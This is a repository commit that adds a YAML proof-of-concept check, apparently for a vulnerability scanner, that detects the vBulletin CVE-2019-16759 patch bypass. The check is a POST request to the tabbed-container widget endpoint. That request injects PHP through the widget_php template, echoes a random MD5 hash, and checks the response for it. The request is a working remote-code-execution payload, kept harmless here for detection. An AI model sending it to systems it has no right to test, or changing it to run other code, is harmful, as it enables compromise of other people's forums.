Create vbulletin-cve-2019-16759-bypass.yml (#824)

* Create vbulletin-cve-2019-16759-bypass.yml
chaitin · Aug 11, 2020 · 4671844 · 4671844
1 parent eb3980d
commit 4671844
Showing 1 changed file with 17 additions and 0 deletions.
diff --git a/pocs/vbulletin-cve-2019-16759-bypass.yml b/pocs/vbulletin-cve-2019-16759-bypass.yml
@@ -0,0 +1,17 @@
+name: poc-yaml-vbulletin-cve-2019-16759-bypass
+set:
+  f1: randomInt(800000000, 900000000)
+rules:
+  - method: POST
+    path: /ajax/render/widget_tabbedcontainer_tab_panel
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: >-
+      subWidgets[0][template]=widget_php&subWidgets[0][config][code]=var_dump(md5({{f1}}));
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(substr(md5(string(f1)), 0, 31))) && response.content_type.contains("application/json")
+detail:
+  author: Loneyer
+  links:
+    - https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/